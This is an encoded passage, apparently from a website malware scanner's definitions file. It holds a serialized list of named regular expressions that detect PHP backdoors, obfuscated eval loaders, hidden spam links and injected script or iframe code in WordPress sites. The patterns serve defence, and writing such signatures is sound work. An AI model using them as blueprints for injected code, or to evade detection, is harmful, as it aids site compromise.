xcc1=qXDFcKVtkZXhpdFwoXCk7XHNdKigkfFw_PikvaSI7fXM6NTA6InBocCBiYXNlNjRfZGVjb2RlIGNyZWF=ZV9mdW5jdGlvbiBWYXJpYWJsZUZpbmN=aW9uIjthOjI6e2k6MDtzOjU6IkY4Qko4IjtpOjE7czoyNTQ6Ii88XD8uKz8oXCRbYS16XzAtOV=rKVxzKj1ccypiYXNlNjRfZGVjb2RlXCguKz8oKFwkW2Etel8wLTldKylccyo9XHMqKFxAPyhnemluZmxhdGV8c3RycmV2KVwoKStcMS4rPyk_KFwkW2Etel8wLTldKylccyo9XHMqY3JlYXRlX2Z1bmN=aW9uXChbXixdK1ssXHNdKyhcMXxcMylbXjtdK1s7XHNdK1w2XChbXjtdK1s7XHNcfV=rKGVsc2VbXHtcc1=rW15cfV=rWztcc1x9XSt8ZWNob1tcc1woXSooWyciXSkuKz9cOVs7XHNcfV=rKSooJHxcPz4pL2lzIjt9czo=NzoicGhwIGZ1bmN=aW9uIHdwX2VucXVldWVfc2NyaXB=IGpzb24yIGFkZF9hY3Rpb24iO2E6Mjp7aTowO3M6NToiRkJBN1EiO2k6MTtzOjM5NToiLyhcL1wqW15cKl=qKFwqW15cKlwvXSopK1wvXHMqKSooaWZbXHNcKFwhXStmdW5jdGlvbl9leGlzdHNcKFxzKlsnIl=oW2Etel8wLTldKylbJyJdW1xzXCldK1x7XHMqKT9mdW5jdGlvblxzKyhbYS16XzAtOV=rKVxzKlwoW15ce1=rXHtccyooKGlmW1xzXChcIV=raXNzZXRbXChcc1=rW15cKV=rW1xzXCldK1tce1xzXSopPyhcJFthLXpfMC=5XStccyo9W147XSs7XHMqKSooXCRbYS16XzAtOV=rXHMqPVxzKik_XCRbYS16XzAtOV=rXHMqXCguKj9iYXNlNjRfZGVjb2RlXCh8KGVjaG98cHJpbnQpW1xzXCgnIl=rPHNjcmlwdC4rP2Zyb21DaGFyQ29kZVwoLis_ZG9jdW1lbnRcLndyaXRlXCgpLis_YWRkX2FjdGlvblxzKlwoW1xzIiddKlteLF=rWyciXCxcc1=rKFw=fFw1KVsnIlwpO1xzXSsvaXMiO31zOjYxOiJwaHAgaWYgZnVuY3Rpb25fZXhpc3RzIGZ1bmN=aW9uIHJldHVybiBWYXJpYWJsZSBGdW5jdGlvbiBldmFsIjthOjI6e2k6MDtzOjU6IkY4RjZ3IjtpOjE7czoxOTY6Ii88XD9bcGhcc1=qKChcL1wqLis_XCpcL1xzKikqKFwkW2EtelxfMC=5XSsoXFtbXlxdXStbXF1cc1x9XSspKj1bXjtdK1s7XHNdKykrKGlmW1xzXChdK1whZnVuY3Rpb25fZXhpc3RzXChbXlx7XStbXHtcc1=rZnVuY3Rpb24gW15ce1=rW1x7XHNdKyhyZXR1cm4gXCRbYS16XF8wLTldK3xldmFsKVwoW147XStbO1x9XHNdKykrKSsoJHxcPz4pL2kiO31zOjQzOiJMZWZ=b3ZlciBIZWFkZXIgaWYgR=xPQkFMUyBIZXggU=VSVkVSIEhleC9pIjthOjI6e2k6MDtzOjU6IkYxNkRnIjtpOjE7czoxODg6Ii88XD9bcGhcc1=raWZccypcKFteXHtdK1wkR=xPQkFMU1tce1xbXVsnIl1cXHhbXlx7XStbXHtcc1=rXCRbYS16XF8wLTldKyhcW1teXF1dK1tcXVxzXH1dKykqPVteO1=rXCRfU=VSVkVSW1x7XFtdWyciXVxceFteO1=rWztcc1=raWZccypcKFteXHtdK1wkR=xPQkFMU1tce1xbXVsnIl1cXHhbXjtdK1tcc1x9O1=qKCR8XD8-KS9pIjt9czo1MzoiaWYgSFRUUF9VU=VSX=FHRU5UIGFkZF9hY3Rpb24gd3BfZm9vdGVyIGZ1bmN=aW9uIGVjaG8iO2E6Mjp7aTowO3M6NToiRjE4RkIiO2k6MTtzOjIxNToiLyhcJFthLXpcXzAtOV=rKFxbW15cXV=rW1xdXSspKlxzKj1ccypnZXRfb3B=aW9uXChbXjtdK1s7XHNdK2lmXHMqXChbXlx7XStIVFRQX1VTRVJfQUdFTlRbXlx7XStbXHtcc1=rYWRkX2FjdGlvblwoWyciXHNdK3dwX2Zvb3RlclsnIlxzLF=rKFthLXpcXzAtOV=rKVsnIlxzXStbXjtdK1s7XHNcfV=rKStmdW5jdGlvblxzK1wzW15ce1=rW1x7XHNdKyhbXlx9XStccyopK1x9L2kiO31zOjMwOiJkaXYgZGlzcGxheSBub25lIGhyZWYgaHR=cCBidXkiO2E6Mjp7aTowO3M6NToiRjNIMFYiO2k6MTtzOjEyNjoiLzwoKGRpdil8KGEpKVxzK1tePl=rKGRpc3BsYXlbXHNcOl=rbm9uZVtePl=rfCg-XHMqPChhKVxzK1tePl=qKT9ocmVmWz=nIl=raHR=cFtePl=rKXsyfT4uKj9idXkuKj9ccyo8XC8oXDN8XDY-XHMqPFwvXDIpPlxzKi9pIjt9czo4NToiQ29weXJpZ2h=IGZ1bmN=aW9uIHNldENvb2tpZSByZXR1cm4gZnVuY3Rpb24gdXNlckFnZW5=IHNldENvb2tpZSB3cml=ZSBpZnJhbWUgdG9wIE5lZyI7YToyOntpOjA7czo1OiJIN=5FWSI7aToxO3M6NDE3OiIvKDwoc2NyaXB=KVtePl=qPlxzKikoXC9cKlxzKkNvcHlyaWdodC4rXHMqXCpcL1xzKnwoXCR8dmFyXHMrKT9bYS16XzAtOVxzXSs9W147XSs7XHMqfHNldFRpbWVvdXRcKFteO1=rO1xzKikqKGZ1bmN=aW9uIFtzZ11ldENvb2tpZVwoLis_KChkb2N1bWVudFwuY29va2llPXxyZXR1cm4pW15cfV=rWztcfVxzXSspKykrLis_W3NnXWV=Q29va2llXCguKz9kb2N1bWVudFwud3JpdGVcKChbIiddKTwoc2NyaXB=fGlmcmFtZSlbXj5dKyhzcmM9WyciXCtcc2h=cHNcOl=rXC9cL3x=b3A6XHMqXC=pKCguKz9kb2N1bWVudFwuY29va2llfC4rP1wudG9VVENTdHJpbmcpezJ9W1woXClcfV=rfC4rP2VuY29kZVVSSUNvbXBvbmVudFwoZG9jdW1lbnRcLnJlZmVycmVyXCkpPy4rP1w4XC9cOT5cOFteO1=rW1wpO1x9XHNdKyg8XC9cMj58JCkvaXMiO31zOjE1OiJwaHAgTG9=cyBvZiBIZXgiO2E6Mjp7aTowO3M6NToiSDMxQVQiO2k6MTtzOjI5NzoiL14oPFw_W3BoXHNdKyhmdW5jdGlvbiBiYXNlNjRbXlx7XStce1xzKnJldHVybiBiYXNlNjRbXlx9XStcfVxzKmlmW1xzXChdK2lzc2V=W1xzXChdK1wkXyhSRVFVRVN8R=V8UE9TKVQuKzxib2R5IG9ubG9hZD1bXHMnIlxcXStsb2NhdGlvbltePl=rW148XSs8XC9ib2R5PlxzKjxcL2h=bWw-XHMqPFw_W3BoXHNcfV=rfCguKz9cXHhbMC=5QS1GXXsyfSl7NTIsfSg_PS4qXCkpW15cbl=rKVxzKigkfFw_Pil8XFx4RUZcXHhCQlxceEJGXHMqPFwhRE9DVFlQRS4rP2V2YWxcKC4rPFwvYm9keT5ccyo8XC9odG1sPlxzKiQpL2lzIjt9czo2MToic2NyaXB=IGRvY3VtZW5=IHdyaXRlIGRpdiBhbmNob3Igc2NyaXB=IGRvY3VtZW5=IHdyaXRlIEVORGRpdiI7YToyOntpOjA7czo1OiJHQlI4SyI7aToxO3M6MTg2OiIvPHNjcmlwdFtePl=qPlxzKmRvY3VtZW5=XC53cml=ZVwoWyInXShbXDxkaXZdWyInIFwrXSopezR9W14-XSo-WyInXVwpO1xzKjxcL3NjcmlwdD5ccyooPGEgLis_PFwvYT5ccyopKzxzY3JpcHRbXj5dKj5ccypkb2N1bWVudFwud3JpdGVcKFsiJ1=oW1w8XC9kaXZdWyInIFwrXSopezV9PlsiJ11cKTtccyo8XC9zY3JpcHQ-L2kiO31zOjQzOiJlY2hvIGRpdiBwb3NpdGlvbiBhYnNvbHV=ZSBuZWdhdGl2ZSBhbmNob3JzIjthOjI6e2k6MDtzOjU6IkgxNTlZIjtpOjE7czozNzE6Ii8oPzwhWyciXSk8KGh=bWw-KT9bXHM8XSooKChzY3JpcHQpW14-XSo-XHMqZG9jdW1lbnRcLndyaXRlW1woXHMnIl=rPCk_ZGl2fChzdHlsZSlbXj5dKj5ccypbXC5cI1=oW2Etel9cLTAtOV=rKVtcc1x7XSspKFteXH1cPl=qKGxlZnR8cG9zaXRpb258dG9wfG9wYWNpdHl8ZmlsdGVyfGRpc3BsYXl8dGV4dC1pbmRlbnQpXDpccyooYWxwaGFcKG9wYWNpdHk9MHwwP1wufFwtWzAtOVwuXXszLH18bm9uZXxhYnNvbHV=ZSkpezMsfVtePl=qPlsnIlwpO1xzXSooPFwvXDU-KT8uKj88KCgoW2Itc11bYS16MC=5XSopW14-XSo-Wy5cc1=qPCkqYSAuKz88XC9hKD5bXjxdKjwoXC8oW15kXVthLXowLTldKnxcMTQpKT8pKikrPihccyo8XC8oXDJ8ZGl2PikpKi9pIjt9czo=MToiUEhQIEdhcmJhZ2UgQXJvdW5kIGV2YWwgVmFyaWFibGUgRnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiRjJDSmQiO2k6MTtzOjE1MToiLzxcP1twaFxzXStcJFthLXpcXzAtOV=rXHMqPShccyonLisnW1wpXC5dKykrKFxzKicuK2V2YWxccypcKFwkW1wkXHtdKlthLXpcXzAtOV=rW1x9IFx=XSooXFtbXlxdXStcXVsgXHRdKikqXCguKydbXClcLl=rKShccyonLisnW1wuO1wpXSspK1xzKihcPz58JCkvaSI7fXM6NzY6InN=cmlwc2xhc2hlcyBSRVFVRVNUIGlmIGVjaG8gcmV=dXJuIGZvcGVuIGZ3cml=ZSBmY2xvc2UgZWNobyBmdW5jdGlvbiByZXR1cm4iO2E6Mjp7aTowO3M6NToiRjJFNmQiO2k6MTtzOjMxMjoiLyhceEVGXHhCQlx4QkYpPzxcP1twaFxzXSsoXCRbYS16XF8wLTldK1xzKj1ccyooc3RyaXBzbGFzaGVzW1woXHNdKyk_XCRfKFJFUVVFU3xHRXxQT1MpVFxbWyInXVteO1=qWztcc1=rKSsoaWZbXChcc1=rXCRbXlx7XSpbXHtcc1=rZWNob1xzKlsiJ11bXjtdK1s7XHNdK3JldHVyblteO1=qO1tcc1x9XSspKy4rP2ZvcGVuXCguKz9md3JpdGVcKC4rP2ZjbG9zZVwoW147XSpbO1xzXStlY2hvXHMqWyInXVteO1=rWztcc1=rKGZ1bmN=aW9uLis_W3Jta117Mn1kaXJcKFteO1=rO1tcc1x9XSsocmV=dXJuW147XSo7W1xzXH1dKykqKSsoJHxcPz4pL2lzIjt9czoyNToiVmFyIEhleCBWYXJpYWJsZSBGdW5jdGlvbiI7YToyOntpOjA7czo1OiJINjRCYiI7aToxO3M6MjA3OiIvKCgoXCRbYS16XzAtOVxzXC5dKz1bXjtdKztccyopKlwkW2Etel8wLTlcc1wuXSs9KFteO1=qXFxbeDAtOWEtZl17MiwzfSkrW147XSo7XHMqKSspKyhpZlxzKlwoW15ce1=rXHtccyopPygoXCRbYS16XzAtOV=rXHMqPVxzKik_XEA_XCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=pKlwoKFteO1=rOyg_PVwpKSkqW147XSs7XHMqKStbXH1cc1=qKFwvXC8uKyk_L2kiO31zOjg5OiJpbmlfc2V=IGlmIGlzc2V=IGFycmF5IGJhc2U2NF9kZWNvZGUgZnVuY3Rpb24gcmV=dXJuIGJhc2U2NF9kZWNvZGUgZXZhbCBWYXJpYWJsZSBGdW5jdGlvbiI7YToyOntpOjA7czo1OiJHNFJMUSI7aToxO3M6MzUwOiIvPFw_W3BoXHNdKyhbaWZcc1woXCFcQF=qKGluaV9zZXRccypcKHxlcnJvcl9yZXBvcnRpbmdccypcKHxzZXRfdGltZV9saW1pdFxzKlwofGlzc2V=XHMqXCh8ZGVmaW5lfGdsb2JhbHxcJFtce1wkYS16XzAtOVx9XFtcXCciXF1cc1=rPSlbXjtdKztbXH1cc1=qKSsoZnVuY3Rpb25ccyooW2Etel8wLTldKylccypcKC4rPyhyZXR1cm5ccyooXDR8YmFzZTY=X2RlY29kZSl8XCRbYS16XzAtOV=rXHMqKFxbW15cXV=qXF1ccyopKilcKC4rPykrKD88IVwvXC8sZnVuY3Rpb25cKHJlc3BvbnNlXCkgXHsgKWV2YWxcKC4rP1wpKztbXHNcfTtdKyhcPz5ccyooXCNcIVtcL2Etel9cLTAtOVwrPVxzXXsyMDAsfSQpP3wkKS9pcyI7fXM6NDY6ImNsYXNzIGNvbnN=IHBhY2sgSCogZnVuY3Rpb24gaW5jbHVkZSBuZXcgQ2xhc3MiO2E6Mjp7aTowO3M6NToiRjVROUciO2k6MTtzOjE5MjoiL2NsYXNzXHMrKFthLXpfMC=5XSspXHMqXHsuKz9jb25zdFxzKyhbYS16XzAtOV=rKVxzKj=uKz9zZWxmXDpcOihbYS16XzAtOV=rKVwocGFja1woJ=hcKidbLFxzXStzZWxmXDpcOlwyXCkrLis_ZnVuY3Rpb25ccytcM1woKFwkW2Etel8wLTldKykuKz9cQD8oaW5jbHVkZXxyZXF1aXJlKShfb25jZSk_W147XStcNC4rbmV3XHMrXDE7L2lzIjt9czoxNDoiZXZhbCBzdHJfcm9=MTMiO2E6Mjp7aTowO3M6NToiRjlQQ2wiO2k6MTtzOjE1OToiLyhcL1wvLispP1xzKigoaW5pX3NldFwofGVycm9yX3JlcG9ydGluZ1wofFwkW2Etel8wLTldK1tcc1wuXSo9KVteO1=qO1xzKikqXEA_KGV2YWx8YXNzZXJ=fFwkW2EtelxfMC=5XSsoXHMqXFtbXlxdXStcXSkqKVxzKlwoXHMqc3RyX3JvdDEzXCgnLionXClcKTsoXHMqXDEpPy9pIjt9czozMjoicGhwIEdMT=JBTFMgSGV4IGZ1bmN=aW9uIGlmIGV2YWwiO2E6Mjp7aTowO3M6NToiRzZHQWoiO2k6MTtzOjYwMjoiLzxcP1twaFxzXSooXHMqXCQoR=xPQkFMU3xbXHtcJCciXStbMC=5X1wtYS16XFwnIlwuXStbXH1cc1=rKVtcc1xbXHsnIl=rKFthLXpfMC=5XSspWyInXH1cXVxzXSsoW147XSo7XHMqZ2xvYmFsXHMqXCRcM1teO1=qO1xzKlwkXDNccyo9XHMqXCRHTE9CQUxTW147XSo7XHMqXCQoXDN8XHtbXlx9XSpcfSspXHMqKFxbW15cXV=rW1xdXHNdK3xce1teXH1dK1tcfVxzXSspKyk_PVxzKlsnIl=oXFx4WzAtOWEtZl17MSwyfSkrWyInXTtccyooKGVjaG98cHJpbnQpP1tcc1xAXSpcJChHTE9CQUx8XDMpW147XSs7XHMqfFwkW2Etel8wLTldK1xzKihbXC49XStccypcQD8oTlVMTHwoYXJyYXlbXChcc1=rKT9cJChHTE9CQUx8XDMpW147XSp8XCRbYS16XzAtOV=rKFxbW15cXV=rW1xdXHNdK3xce1teXH1dK1tcfVxzXSspKnxbIiddKykpKztccyp8Z2xvYmFsXHMqXCRbXjtdKztccyp8ZnVuY3Rpb25ccytbMC=5X2Etel=rXHMqXChbXlx7XSt8XHtccyp8XH1ccyp8KGZvcihlYWNoKT98KGVsc2VccyopP2lmKVxzKlwoLis_XCkrXHMqfHJldHVyblteO1=qO1tcc1x9XSspezMwLH=pK2V2YWxcKC4rP1wpKztbXHNcfV=rKGV4aXRbXjtdKjtbXHNcfV=rKT8oJHxcPz4pL2kiO31zOjM2OiJwaHAgaWYgaXNzZXQgUE9TVCBiYXNlNjRfZGVjb2RlIG1haWwiO2E6Mjp7aTowO3M6NToiSDRMQUMiO2k6MTtzOjQ2NDoiLzxcP1twaFxzXSooKFwkKFswLTlfYS16XSspXHMqPVxzKmV4cGxvZGVbXixdKyxccypiYXNlNjRfZGVjb2RlXChbXjtdKztccyp8KChpZnxpc3NldHxmb3JlYWNoKVxzKlwoKStcJF8oUkVRVUVTfEdFfFBPUylUW15cKV=rW1wpXHNce1=rKT8oXCRbMC=5X2Etel=rW1xzXC5dKj1ccypbYS16XzAtOVxzXChdKlwkKFwzfF9SRVFVRVNUfF9HRVR8X1BPU1QpKFteO1=qW1wpO1x9XHNdK2Vsc2VbXHtcc1=qfGVjaG98cHJpbnQpKlteO1=qWztcc1=rKFxzKmV4aXQ7KT98XC9cLy4rXG4rKVtcfVxzXSopKyhcJFswLTlfYS16XStbXHNcLl=qPVxzKiIuKz9cXHJcXG4iO1xzKikqKChcJFthLXpfMC=5XStccyo9XHMqfGlmW1xzXChdK3xlbHNlW15ce1=qW1x7XHNdKykqbWFpbFxzKlwoW147XStbXCk7XHNcfV=qKChpZltcKFxzXSt8ZWxzZSlbXlx7XSpbXHtcc1=rZWNob1teO1=qfGV4aXQpKls7XHNcfV=rKSsoJHxcPz4pL2kiO31zOjMwOiJ3cF9lbnF1ZXVlX3NjcmlwdCBTV=VFVENBUFRDSEEiO2E6Mjp7aTowO3M6NToiRjZVR2wiO2k6MTtzOjYwOiIvd3BfZW5xdWV1ZV9zY3JpcHRcKFteLF=rLFxzKlsnIl1odHRwLis_U1dFRVRDQVBUQ=hBW147XSs7L2kiO31zOjM4OiJwaHAgY2xhc3MgVmFyaWFibGUgRnVuY3Rpb25zIG5ldyBDTEFTUyI7YToyOntpOjA7czo1OiJIQURITSI7aToxO3M6NDY3OiIvPFw_W3BoXHNdKyhcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKnwoaW5pX3NldHxlcnJvcl9yZXBvcnRpbmd8c2V=X3RpbWVfbGltaXQpXChbXlwpXSpcKTtccyopKihjbGFzcyBCXHMqXHsuKj9yZXR1cm4gJ1VOJ1teO1=qWztcfVxzXSt8ZnVuY3Rpb25bXlwoXStkb2xseVteXHtdK1x7Lio_KHJldHVybnxkYkRlbHRhKVteO1=qWztcfVxzXSopKmNsYXNzXHMrKFthLXpfMC=5XSspXHMqXHsuKz8oKFwkW2Etel8wLTlceyciXH1dKyhccypcW1teXF1dK1xdKSpccyo9XHMqKT8oKD88IW5ld1xzKVwkW2Etel8wLTlce1x9XSsoXHMqXFtbXlxdXStcXSkqfGZmaWxlX3B1dF9jb25=ZW5=cylccypcKFteXCldKlwpKztbXiJdKSsuKygoXCRbYS16XzAtOVx7XH1dKylccyo9XHMqKT9uZXdccytcNlwoW15cKV=qXCkrWztcc1=rKFwxMy=-W2Etel8wLTlce1x9XStccypcKFteXCldKlwpK1s7XHNdKykqKCR8XD8-KS9pcyI7fXM6MTQ6InZpc2l=b3JUcmFja2VyIjthOjI6e2k6MDtzOjU6IkY5TUhtIjtpOjE7czoxNzc6Ii8oKDxcIS=tfFwvXCopdmlzaXRvclRyYWNrZXIoXCpcL3wtLT4pKVxzKig8XD9bcGhcc1=rLis_YmFzZTY=X2RlY29kZVxzKlwoLis_XD8-fC4rP2RvY3VtZW5=XC5jcmVhdGVFbGVtZW5=XChbJyJdc2NyaXB=WyInXVwpO1xzKlthLXpfMC=5XStcLnNyY1xzKj1bXHMnIl=raHR=cFw6XC9cLy4rPylccypcMS9pcyI7fXM6NTg6ImZzb2Nrb3BlbiBmd3JpdGUgd2hpbGUgZmVvZiBmY2xvc2UgcHJlZ19tYXRjaCBnenVuY29tcHJlc3MiO2E6Mjp7aTowO3M6NToiRkE1TE8iO2k6MTtzOjIzMjoiLyhcJFthLXpfMC=5XSspXHMqPVxzKlxAP2Zzb2Nrb3BlblwoW147XSs7XHMqaWZbXChcc1=rXDFbXClcc1=qXHsuKz9md3JpdGVcKFwxW147XSs7XHMqd2hpbGVbXHNcKFwhXStmZW9mXChcMS4rP2ZjbG9zZVwoXDFcKTtccypwcmVnX21hdGNoXChbXixdKyxbXixdKyxccyooXCRbYS16XzAtOV=rKVwpO1xzKmlmW1woXHNdK1wyXFsxXF1bXHNcIV=qPS4rP2d6dW5jb21wcmVzc1woW147XSs7W1x9XHNdKy9pcyI7fXM6MjA6IlRhZ2dlZCBldmFsIGZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6IkczVDlBIjtpOjE7czoxMjU6Ii8oXC9cKlteXCpdK1wqXC8pXHMqKFtcc2Etel8wLTlcPV=rKSpbO1xzXChdKih3aW5kb3dbXC5cWyInXStcXHhbXjtdK3xmdW5jdGlvblwoXCkuKyk7XHMqZXZhbFtcKFxzXStbXlwpXStbJyJcc1woXCk7XH1dK1wxL2lzIjt9czo=NDoic2NyaXB=IHZhciBodHRwIGlmIGRvY3VtZW5=IHdyaXRlIHNjcmlwdCBzcmMiO2E6Mjp7aTowO3M6NToiRzJDSXciO2k6MTtzOjM1MjoiLyg8c2NyaXB=W14-XSo-XHMqKCh2YXJccyopP1thLXpfMC=5XStccyo9WyciO1xzXSooc2V=VGltZW91dHxlbmNvZGVVUklDb21wb25lbnQpXChbXlwpXSpbJyJcKTtcc117Mix9KSsoW3ZhclxzXSooW2Etel8wLTldKylccyo9XHMqWyciXVtoZnRdK3RwW3NdKjpcL1wvW147XSs7XHMqKCh2YXJccyopPyhbYS16XzAtOV=rKVxzKj1ccypcNlteO1=rO1xzKikrKT9pZlteXHtdK1x7XHMqZG9jdW1lbnRcLndyaXRlXChbIiddPFtzY3JpcHRccyciXCtdezcsfVteXH1dKnNyYz1bJyJcc1wrXSsoXDl8W2ZodF=rdHBbc1=qOlwvXC8uK2pxdWVyeVwuKG1pblwuKSpwaHApKFteO1=rW1x9O1xzXSspKz88XC9zY3JpcHQ-KSsvaSI7fXM6NDU6ImZ1bmN=aW9uIHVuc2V=IHdwX2xpc3RfdGFibGUgaXRlbXMgYWRkX2FjdGlvbiI7YToyOntpOjA7czo1OiJHQUdFRyI7aToxO3M6NDQzOiIvKFwvXCpbXlwqXSooXCpbXlwqXC9dKikrXC9ccyopKihcJFteO1=rPVteO1=rO1xzKikqKGlmW1woXHNcIV=rZnVuY3Rpb25fZXhpc3RzW1woXHMnIl=raW5pX3NldFsnIlwpXHtcc1=rKFxAP2luaV9zZXRcKFteO1=rWztcc1=rKStbXHNcfTtdKykqZnVuY3Rpb25ccysoW2Etel8wLTldKylccypcKFteXH1dKyhwYWNrXChbJyJdSFwqWyciLFxzXC4wLTlBLUZcKV=rO1xzKmlmW1xzXChcQGlzX1=rZmlsZVtfYS16XSpbXChcc1=rKFwkW2Etel8wLTldKykuKz9maWxlX2dldF9jb25=ZW5=c1tcc1woXStcOC4rP2ZpbGVfcHV=X2NvbnRlbnRzW1xzXChdK1w4fHVuc2V=XChcJHdwX2xpc3RfdGFibGUtPml=ZW1zXFt8ZmlsZV9nZXRfY29udGVudHNcKF9fRklMRV9fLis_ZnB1dHNcKC4rP3NjYW5kaXJcKCkuKz9hZGRfYWN=aW9uXChbXixdK1ssXHMwLTlcKSciXStcNlteO1=rOy9pcyI7fXM6Mzk6InBocCBlcnJvcl9yZXBvcnRpbmcgZnVuY3Rpb24gZGV=ZWN=X2NtcyI7YToyOntpOjA7czo1OiJGQkJHMCI7aToxO3M6MTYwOiIvPFw_W3BoXHNdKyhcQD8oZXJyb3JfcmVwb3J=aW5nfHNldF9=aW1lX2xpbWl=fGluaV9zZXQpXCguKj8wXCk7XHMqKSsuKj9mdW5jdGlvbiAoZGV=ZWN=X2Ntc1woKS4rXDNbXjtdKztccyooKGlmXHMqXChbXlwpXSt8ZWxzZSlbXlx7XSpbXlx9XStbXH1cc1=rKSsoJHxcPz4pL2lzIjt9czo1MToiZnVuY3Rpb24gZ2x1ZXNfaXQgc2FuaXRpemVfa2V5IGNhbGxfdXNlcl9mdW5jX2FycmF5IjthOjI6e2k6MDtzOjU6IkZCSTlLIjtpOjE7czoyOTI6Ii8oaWZbXHNcKFwhXStmdW5jdGlvbl9leGlzdHNcKFxzKlsnIl1bYS16XzAtOV=rWyciXVtcc1wpXStce1xzKik_ZnVuY3Rpb25ccysoW2Etel8wLTldKylccypcKFteXCldK1tcKVxzXStce1xzKihcJFthLXpfMC=5XSspXHMqPVxzKnNhbml=aXplX2tleVwoW147XSs7XHMqKFwkW2Etel8wLTldKylccyo9XHMqY2FsbF91c2VyX2Z1bmNfYXJyYXlcKFxzKlwzW147XSs7XHMqcmV=dXJuXHMqXDQuK1wyXHMqXChbXjtdKztccyouK2NhbGxfdXNlcl9mdW5jX2FycmF5XChbXjtdKztbXH1cc1=rKCR8KD89XD8-KSkvaXMiO31zOjE2OiJwaHAgZXZhbCBWYXIgSGV4IjthOjI6e2k6MDtzOjU6IkZCS=tSIjtpOjE7czoxMTU6Ii88XD9bcGhcc1=rKEA_ZXZhbFxzKlwoXHMqKSsoWyciXSlbXHNcXF=qXCRbYS16XF8wLTlcW1xdXHtcfVxzJyJdKz1bXHNcXCciXSooXFx4WzAtOV17Mn=pKy4rXDIoXHMqXCkpKztccyooJHxcPz4pL2kiO31zOjI5OiJpZiBzdHJwb3MgUkVRVUVTVF9VUkkgaW5jbHVkZSI7YToyOntpOjA7czo1OiJGQ1FGUyI7aToxO3M6MTQ5OiIvaWYoW1xzXChdK3N=clthLXpfMC=5XSspezIsfVtcc1woXStcJF9TRVJWRVJcW1siJ11SRVFVRVNUX1VSSVsnIl1cXVxzKlwpK1teXCldK1tcKVxzXStce1tcc1xAXSooaW5jbHVkZXxyZXF1aXJlKShfb25jZSk_W147XStbO1xzXSsoZXhpdFtccztdKyk_XH=vaSI7fXM6NzY6ImVycm9yX3JlcG9ydGluZyBpbmlfc2V=IHNldF9=aW1lX2xpbWl=IGlnbm9yZV91c2VyX2Fib3J=IGVsc2VpZiByZXF1aXJlX29uY2UiO2E6Mjp7aTowO3M6NToiRkNVTGQiO2k6MTtzOjIxOToiLzxcP1twaFxzXSsoXC9cKlteXCpdKihcKlteXCpcL1=qKStcL1xzKnxcL1wvW15cbl=qXHMrKSooKGVycm9yX3JlcG9ydGluZ3xpbmlfc2V=fHNldF9=aW1lX2xpbWl=fGlnbm9yZV91c2VyX2Fib3J=KVxzKlwoW147XStbO1xzXSspezUsfSgoZWxzZVxzKnxpZlxzKlwoK1teXCldK1tcc1wpXSspK1xAPyhyZXF1aXJlfGluY2x1ZGUpKF9vbmNlKT9bXjtdK1s7XHNdKykrKCR8XD8-KS9pIjt9czo4MzoicGhwIGlmIGZ1bmN=aW9uX2V4aXN=cyBmdW5jdGlvbiBjdXJsX2luaXQgcmV=dXJuIGZ1bmN=aW9uIHRyaW=gcmV=dXJuIGJhc2U2NF9kZWNvZGUiO2E6Mjp7aTowO3M6NToiRzE4Rm4iO2k6MTtzOjQwNToiLzxcP1twaFxzXSsoXCRbYS16XzAtOV=rKVxzKj1bXjtdKztccyppZlxzKlwoXHMqXCFmdW5jdGlvbl9leGlzdHNcKFsiJ1=oW2Etel8wLTldKylbJyJdXClbXClcc1x7XSpmdW5jdGlvblxzKlwyXChbXlwpXStcKVtcKVxzXHtdK1teXG5dKmN1cmxfaW5pdFwoXCk7Lis_cmV=dXJuW147XSs7W1xzK1x9XStpZlxzKlwoXHMqXCFmdW5jdGlvbl9leGlzdHNcKFsiJ1=oW2Etel8wLTldKylbJyJdXClbXClcc1x7XSpmdW5jdGlvblxzKlwzXChbXlwpXStcKVtcKVxzXHtdK1teXG5dKnRyaW1bXjtdKzsuKj9yZXR1cm5bXjtdKztbXHMrXH1dKyguKj8oYmFzZTY=X2RlY29kZVtcKFxzXStcMXxcMlwofFwzXCgpW15cKV=qW1wpXHNdK1teO1=qWztcc1=rKXszLH=oKGVjaG98cHJpbnQpW147XSs7XHMqKSsoJHxcPz4pL2lzIjt9czoxMjoiUEhQIHJldmVyc2VkIjthOjI6e2k6MDtzOjU6IkcyOEFyIjtpOjE7czo=MToiL14oXHMqXD5cP1xzKik_Oy4rXCQoW3BoXHNdKlw_XDxccyopPyQvaXMiO31zOjM=OiJpZiBpc3NldCBSRVFVRVNUIFZhcmlhYmxlIEZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6Ikg4N=5qIjtpOjE7czozMTc6Ii8oPFw_W3BoXHNdKlxAXHMqKFsnIl=pW15cMl=qXDI7Lis_KT9pZltcc1woXCFdKyhpc3NldHxlbXB=eSlbXHNcKF=rXCRfKFJFUVVFU1R8R=VUfFBPU1R8Q=9PS=lFKS4rW1x7XHNdKihcJFthLXpfMC=5XHtcfV=rXHMqPVxzKignW14nXSonfCJbXiJdKiJ8XCQpW147XSpbJyI7XClcc1=qfGV4dHJhY3RbXHNcKF=rXCRfXDRbXHNcKV=rO1xzKikqKFwkW2Etel8wLTldK1xzKj1ccyopP1xAPyhcJCg_IWRlbGV=ZV9zZXJ2aWNlKVthLXpfMC=5XSspKFxzKlxbW15cXV=qXF=pKnMqXCguKj9cKStccyo7LipbXH1cc1=qKGVsc2Vccypce1tefV=rXH1ccyopKi9pIjt9czoxODoiZXZhbCBiYXNlNjRfZGVjb2RlIjthOjI6e2k6MDtzOjU6Ikg4OE5VIjtpOjE7czozNTM6Ii8oXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC9ccyp8XEA_KChlcnJvcl9yZXBvcnRpbmd8aW5pXyhzZXR8cmVzdG9yZSkpXChbXlwpXSpcKXwoXCRbYS16XzAtOV=pK1xzKj1ccypbXjtdKyk7XHMqfFw_PlxzKjxcP1twaFxzXSopKihpZltcKFxzXStpc3NldFwoXCRfKFBPU3xHRXxSRVFVRVMpVFxbW15cKV=rW1wpXHNdK3xlY2hvXHMqKSooKFwkW2Etel8wLTldKylccyo9XHMqXEA_YmFzZTY=X2RlY29kZVwoW147XSs7XHMqXEA_KGV2YWxcKC4qXDEwfFwxMFxzKlwoXHMqXCRfKFBPU3xHRXxSRVFVRVMpVCl8XEA_ZXZhbFwoW147XSpiYXNlNjRfZGVjb2RlXCgpW15cKV=qXCkrO1xzKihyZXR1cm5bXjtdKjspKi9pIjt9czozMToicGhwIGlmIG1kNSBSRVFVRVNUIGV2YWwgUkVRVUVTVCI7YToyOntpOjA7czo1OiJIODhOW